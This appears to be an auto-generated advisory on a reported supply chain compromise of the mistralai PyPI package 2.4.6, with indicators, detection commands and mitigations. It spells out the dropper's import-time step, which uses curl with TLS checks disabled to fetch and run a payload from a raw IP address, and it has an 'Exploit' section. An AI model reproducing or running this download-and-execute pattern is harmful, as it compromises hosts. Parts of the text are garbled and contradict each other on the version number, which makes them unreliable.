Listen to this Post
The vulnerability is a supply chain attack on the `mistralai` PyPI package version 2.4.6. No legitimate tag, commit, or release workflow exists for this version; the last clean version is 2.4.5. The attacker bypassed PyPI Trusted Publishing to upload a malicious sdist. The malicious code resides in src/mistralai/client/__init__.py, adding a function `_run_background_task()` that executes at module import time, not during pip install. On Linux only, it first checks environment variable `MISTRAL_INIT` to avoid re-execution. If not set, it sets `MISTRAL_INIT=1` and downloads a payload from `https://83.142.209.194/transformers.pyz` using `curl -k -L -s(TLS verification disabled) to/tmp/transformers.pyz. It then spawns this Python zipapp as a detached process withsubprocess.Popen, discarding stdout/stderr. The download is skipped if the file already exists. All exceptions are silently ignored. On non-Linux platforms, the function returns immediately. The second-stage payload (transformers.pyz) was not analyzed, so its behavior is unknown. The trigger is `import mistralai` – any Linux process importing this version immediately executes the dropper. The upload occurred around 2026-05-12 00:05 UTC. The PyPI project is quarantined. Indicators include the file/tmp/transformers.pyz, a background Python process running it, the environment variableMISTRAL_INIT=1, and outbound HTTPS to `83.142.209.194` without TLS verification.
<h2 style="color: blue;">DailyCVE form:</h2>
Platform: PyPI Python
Version: 2.4.6
Vulnerability: Malicious code dropper
Severity: Critical
Date: 2026-05-12
<h2 style="color: blue;">Prediction: Patch date 2026-05-15</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Check installed version pip show mistralai | grep -i ^version Find affected version in dependencies grep -n -E 'mistralai\b.2\.4\.6' requirements.txt pyproject.toml uv.lock poetry.lock Pipfile Pipfile.lock 2>/dev/null Check for dropped payload ls -la /tmp/transformers.pyz Look for malicious function (if source available) grep -r "_run_background_task" src/mistralai/client/ Search for MISTRAL_INIT in process environment ps auxe | grep MISTRAL_INIT Monitor outbound connections to IOC sudo netstat -anp | grep 83.142.209.194
<h2 style="color: blue;">Exploit:</h2>
On Linux, simply `import mistralai` inside any Python script or interpreter triggers the dropper. No user interaction or additional privileges needed. The code downloads and executes `/tmp/transformers.pyz` silently. Example one-liner:python -c “import mistralai”. The exploit bypasses TLS verification (-kflag) and runs detached, evading simple process monitoring.git+https://github.com/mistralai/[email protected]`
<h2 style="color: blue;">Protection from this CVE:</h2>
- Pin `mistralai` to 2.4.5 or earlier: `pip install mistralai==2.4.5`
- Use git source:
– Block outbound HTTPS to `83.142.209.194` via firewall or egress proxy.
– Set environment variable `MISTRAL_INIT=1` before any import (breaks dropper early return).
– Monitor and delete `/tmp/transformers.pyz` if present.
– Use PyPI’s trusted publishing verification and avoid untrusted versions.
– Run `pip install` with `–no-deps` and audit wheels/sdists before installation.
Impact:
Full compromise of any Linux host that imported `mistralai==2.6.4` (should be 2.4.6). The second-stage payload (transformers.pyz) could exfiltrate credentials, install backdoors, mine cryptocurrency, or pivot to internal networks. All secrets accessible to the importing process (environment variables, AWS/GCP metadata, SSH keys, tokens) are at risk. Host should be considered fully owned. Incident response requires credential rotation, forensic audit of processes, network logs, and filesystem changes from 2026-05-12 onward. Cloud audit trails must be reviewed for unauthorized API calls.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

